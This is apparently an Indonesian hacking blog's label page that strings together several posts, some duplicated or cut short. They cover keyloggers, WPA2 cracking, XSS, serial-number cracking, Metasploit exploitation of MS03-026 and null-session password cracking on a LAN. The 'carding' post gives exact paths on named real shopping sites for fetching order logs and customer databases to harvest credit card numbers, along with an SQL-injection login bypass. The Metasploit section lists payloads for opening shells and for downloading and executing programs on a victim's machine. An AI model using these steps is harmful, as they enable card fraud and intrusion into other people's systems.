Assalamu`alaikum sekarang saya
akan mengshare keylogger dengan metasploit dan cukup berguna untuk
merekam kegiatan target di komputernya,Btw mengapa judulnya kayak gini (Merekam ketukan keyboard target tanpa menyentuh komputernya – keylogger canggih),
iyah betul judulnya sesuai kok sama kenyataannya,,yang biasanya ente
kalo mau ngerjain temen buat ngerekam keyboard target pake keyloger
dengan harapan si korban masukin email dan lain sebagainya.. Ente
mondar mandir berkali kali kekomputer target buat naro keylogger dengan
berbagai macam alesan,,entah numpang mindahin file or apalah buat naro
sebuah keylogger aja,,alesan yang pertama
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Sunday, September 16, 2012
Wi-Fi Cracking With Backtrack
Sekarang saya iseng-iseng kembali share tentang cracking Wi-Fi WPA2
dengan menggunakan backtrack 5 saya terinspirasi karena sekarang Pasti
begitu banyak dan sangat mudah mendapatkan Hotspot Gratis, tapi juga ada
yang menggunakan Password! Sial klo sedang mau wireless’an eh di
password. Nah berikut ini adalah cara untuk melakukan Hacking / Cracking
terhadap WPA / PSK yang di password.
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
Oke, yang diperlukan adalah:
1. Anda menggunakan BackTrack 5 Linux sebagai OS Secondary anda, buatlah dual booting di LAPTOP anda
Resource Hacking
Kesempatan kali ini saya akan posting tentang resource hacker.
Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.
Apa itu Resource Hacker ??? dari judul nya saja mungkin anda sudah bisa menebak, bahwa ini merupakan Software FreeWare yang tugas nya.
1. Membuka source kode dari (*.exe, *.dll, *.cpl, *.ocx)
2. Merubah dan mengedit source secara langsung.
3. Memodifikasi secara langsung.
XSS attack untuk pemula
Saya berkeinginan membagikan sedikit yang saya
punya. mungkin ini sekedar tutor cupu dari seorang new bee kaya saya ne.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.
Ok...ada baiknya kita mengetahui, apakah Xss itu.
XSS adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client. Xss mungkin jenis serangan yang paling cupu bagi seorang attacker yang tidak mempunyai Bug atau exploit. dikarenakan Xss hanya membutuhkan sebuah browser saja.
Bagaimanakah menemukan Situs yang vulner?
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah
Mmpph......mencari situs yang vulner emang gampang-gampang susah, karena kebanyakan situs udah
Menembus proteksi serial number dan password
Latar belakang
Mungkin dalam keseharian ada di antara kita yang tidak sengaja menghilangkan Password atau Serial Number dari program yang sudah kita beli. Kalau sudah begitu tentunya repot. Untuk mendapatkannya kembali bisa saja dengan menghubungi toko retail maupun vendor program tempat program tersebut dibeli. Namun, jika ada peraturan dari vendor yang mengharuskan membeli ulang password maupun serial number yang hilang, bagaimana? Bagi Anda mungkin itu bukan masalah . Tapi bagi Saya itu mungkin salah satu masalah besar. Dari kasus inilah Saya mencoba menerapkan kegunaan Win32 Hook. Sekedar informasi, teknik seperti ini sering digunakan oleh para Reverser di dunia Reverse Engineering. Untuk melakukan debugging file berukuran besar bukan hal yang mudah, memerlukan waktu lama dan harus didukung dengan hardware yang cukup mewah. Bayangkan saja
Mungkin dalam keseharian ada di antara kita yang tidak sengaja menghilangkan Password atau Serial Number dari program yang sudah kita beli. Kalau sudah begitu tentunya repot. Untuk mendapatkannya kembali bisa saja dengan menghubungi toko retail maupun vendor program tempat program tersebut dibeli. Namun, jika ada peraturan dari vendor yang mengharuskan membeli ulang password maupun serial number yang hilang, bagaimana? Bagi Anda mungkin itu bukan masalah . Tapi bagi Saya itu mungkin salah satu masalah besar. Dari kasus inilah Saya mencoba menerapkan kegunaan Win32 Hook. Sekedar informasi, teknik seperti ini sering digunakan oleh para Reverser di dunia Reverse Engineering. Untuk melakukan debugging file berukuran besar bukan hal yang mudah, memerlukan waktu lama dan harus didukung dengan hardware yang cukup mewah. Bayangkan saja
Hacking "C" Card
Assalamu`alaikum Wr.Wb.
1. CGI store Log
Sekarang saya akan mencoba share sedikit tentang carding untuk yang
baru mau mengenal dunia carding. Mohon di abaikan bagi master-master
carding di luar sana,yang pastinya sangat mahir dalam melakukan carding
ini.
Saya harap ini
jangan digunakan untuk hal-hal yang merugikan orang lain karena kegiatan
ini tergolong tindak kejahatan, oleh karena itu. Sebaiknya ini di
jadikan pengetahuan semata dan di gunakan untuk para calon administrator
web shopping cart agar lebih teliti dan safety dalam mengelola
database,log,dan web itu sendiri.
Ok Lets begin >>>>>
1. CGI store Log
Disini kamu harus usaha sendiri untuk mencari target yang akan kamu pakai cc nya.
Coba gunakan ini:
A. http://www.chaswells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm
B. And then delete Repair_Manuals.htm in url/browsing sehingga menjadi http://www.chaswells.com/cgi-bin/store/index.cgi?page=
C. Input file is behind the web :
.../admin/files/order.log
for example : http://www.cashwells.com/cgi-bin/store/index.cgi?page=admin/file/order.log
D. So that comes out from the site is number cc (credit card).
2. Admin Take Over
Same as above you must try yourself to find the target.
This should be done:
A. http://www.partsupply.in.th/shopadmin.asp
B. And then next use sql injection techniques
user : 'or"='
pass : 'or"='
C.
Trus kamu buka file" yang ada disana satu persatu. Dapat deh no CC yg
kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu
bernasib baik. TApi kalo belum ada nomor CC (credit card) disana,
artinya kamu belum beruntung. coba cari lagi target yang lain.
3. Database Downloadable
Same as above you must try yourself to find the target.
This should be done:
A. http://www.youngsliquors.com/winestore/shopadmin.asp
B. And then next delete shopadmin.asp in url/browsing so be http://www.youngsliquors.com/winestore/
C. Input file is behind the web:
shopdbtest.asp
for example : http://www.youngsliquors.com/winestore/shopdbtest.asp
D. And then look the name database and the place : xDatabase and xDblocation
example:
xDatabase : shopping300
xDatabase :..../.../../.../www.youngsliquors/5498761211
E. Sekarang untuk mendownload file shopping300 dapat dilakukan dengan merubah url/browsing nya menjadi:
http://www.youngsliquors.com/winestore/shopping300.mdb
F. Kalo sudah di download, buka file shopping300.mdb dengan ms.Access.
4. Metacart
Same as above you must try yourself to find the target.
This should be done:
A. http://www.imagexpres.com/metacart/moreinfo.asp
B. And then next delete moreinfo.asp in url/browsing so be http://www.imagexpres.com/metacart/
C. Input file is behind the web ;
database/metacart.mdb
example : http://www.imagexpres.com/metacart/database/metacart.mdb
D. Kalo sudah di download, buka file metacart.mdb dengan ms.access
5. PDshopPro Shopping Cart
Same as above you must try yourself to find the target.
This should be done:
A. http://www.marktwainbooks.com/shop/category.asp?catid=4
B. And then next delete shop/category.asp?catid=4 in url/browsing so be http://www.marktwainbooks.com
C. Input file is behind the web:
admin/dbsetup.asp
example : http://www.marktwainbooks.com/admin/dbsetup.asp
D. Maka yang keluar dari situs itu adalah:
Your Database Type:
Microsoft Access
Your Connection String :
Driver={Microsoft Access Driver(*.mdb)};DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
Current Status :
Connection to Database OK.
Database Primary 'setup' Table Found!
Database Permissions OK!
E. Sekarang untuk mendownload file pdshoppro.mdb dapat dilakukan dengan merubah url/browsing nya menjadi:
http://www.marktwainbooks.com/data/pdshoppro.mdb
F. Kalo sudah di download, buka file pdshoppro.mdb dengan Ms.Access.
Ok,itu sebagian cara untuk teknik mencari data CC target.
----------------------------------------------------------------------------------------------
Ini hanya sebuah informasi yang perlu anda ketahui.
Semoga bermanfaat.
----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
Hacking menggunakan Metasploit
METAPLOIT Framework ver. 2.6. Aplikasi
ini berfungsi untuk mengexploitasi kelemahan suatu system ataupun
aplikasi. Aplikasi ini bisa untuk penetration testing ke System Windows,
Unix/Linux, dan MacOs, tapi yang lebih cenderung Exploitable adalah
Windows SP1. Untuk lebih lengkapnya dapat di baca di website resminya
www.metasploit.com.
Ketika
saya menulis artikel ini, metasploit
sudah merilis yang versi 4.0, tapi saya menggunakan versi 2.6, karna
pada dasarnya sama saja, hanya saja versi 4.0 lebih banyak exploitnya.
Oh iya, dalam Metasploit Framework, kita sudah disediakan banyak
exploit, sehingga tidak perlu mendownload lagi. Fungsi exploit yaitu
mengirim buffer Overflow pada system korban, sehingga kita dapat
mentakeover shellnya.
Langsung saja, berikut installasinya di Windows.
1. Download dulu di webiste resminya www.metasploit.com, jika tak ada ver. 2.6, coba cari aja di Google.
2. Kemudian install, dan jalankan msfweb.
Maka akan muncul window shell seperti berikut.
3. Buka Web Browser bisa Internet Explorer, Mozilla, Google Chrome, dll. Dan pergi ke http://127.0.0.1:55555, maka tampilannya seperti berikut.
Mungkin tampilan web gui anda akan sedikit berbeda, karena templatenya disini telah saya ganti.
4. Kemudian cari corban yang akan kita exploitasi. Bisa menggunakan NMAP,
terus kita lakukan port scanning. Disini kita akan mencoba pada system
OS Windows Server 2003 yg masih fresh install (belum di Patch). Pada
port scanning, pastikan port untuk MSRPC tebuka (default = open).
Download NMAP di
5.Memilih Exploit.
Pada Metasploit Web Interface, di bagian FILTER MODULES pilih “app :: dcom”, setelah itu pilih exploit Microsoft RPC DCOM MSO3-026.
Pilih target pada pilihan Select Target
6. Memilih Payload
Pilih salah satu payload diatas, jika masih bingung, pilih saja win32_bind, yang akan mengexploitasi dan langsung masuk ke command shell target. Berikut beberapa fungsi-fungsi payload :
win32_adduser : menambah user pada system korban
win32_bind : masuk ke shell korban
win32_bind_dllinject : untuk upload / inject dll files
win32_bind_meterpreter : exploitasi dengan menjalankan meterpreter (I like it).
win32_bind_vncinject : inject vncserver pada system korba (untuk kita remote melalui vncviewer).
win32_downloadexec : mendownload dan mengeksekusi aplikasi pada pc korban
win32_exec : mengeksekusi command di system korban.
Sedangkan BIND, PASSIVE, REVERSE, pada dasarnya sama saja.
RHOST ==>> Ip Address Korban (Remote).
LHOST ==>> Ip Address Kita (Local)
RPORT ==>> Port Korban
LPORT ==>> Local Open Port
Setelah di isi semua, kemudian klik exploit untuk memulai menghack target.
Selamat mencoba.
Source: http://lebaksono<dotz>wordpress<dotz>com/2010/11/16/hacking-dengan-metasploit-exploit/
- Nie nte klo mau nonton video tutorial metasploit menggunakan Armitage :
Hacking LAN
Hack Local Area Network
This technique will be taking advantage of Port 139.
Most of the time, Port 139 will be opened.
First of all,I will do a port scanning at the target computer which is 192.168.40.128.
This computer is inside my LAN network.
I will scan it using Nmap.
You can get both of them on the Internet.
After you get both of them,put them in the C:\ directory.
You now need to create a null session to the target computer.
Now
open the Command Prompt and browse to the USER2SID & SID2USER
folder.There will be 2 tools inside it,one will be USER2SID and another
one will be SID2USER.
We will first using USER2SID to get the ID.
We will test against the Guest account because Guest account is a built in account.
After we get the ID,we need to do some modification on the ID.
We take the ID we get from the guest account and modified it become
“5 21 861567501 1383384898 839522115 500″.
“5 21 861567501 1383384898 839522115 500″.
Please leave out the S-1-,leave out all the – too.
Now you will see that you get the username of the Administrator account.
In this case,the Administrator account is Administrator.
Create a text file called user.txt and the content will be the username of the Admin account.
Prepare yourself a good wordlist.
Now put both of them in the same directory with the NetBios Auditing Tool.
Now we are going to crack the Admin account for the password in order to access to the target computer.
Browse to the NetBios Auditing Tool directory.
Press on enter and the tool will run through the passlist.
In this case,I have get the password.
In order to proof that I can get access to the target computer using this password.
After you press enter,it will prompt you for the username and password.
Therefore,just input them inside the prompt and continue.
Target C drive will be on your screen.
In
order to prevent from this attack,close down port that you do not
want to use such as Port 135,Port 136,Port 137,Port 138 and Port 139.
The download link of the tools will be:
Sumber:
ozcorp@team
ozcorp@team
- Bonus nie:
Mantap kan gan??
Subscribe to:
Posts (Atom)


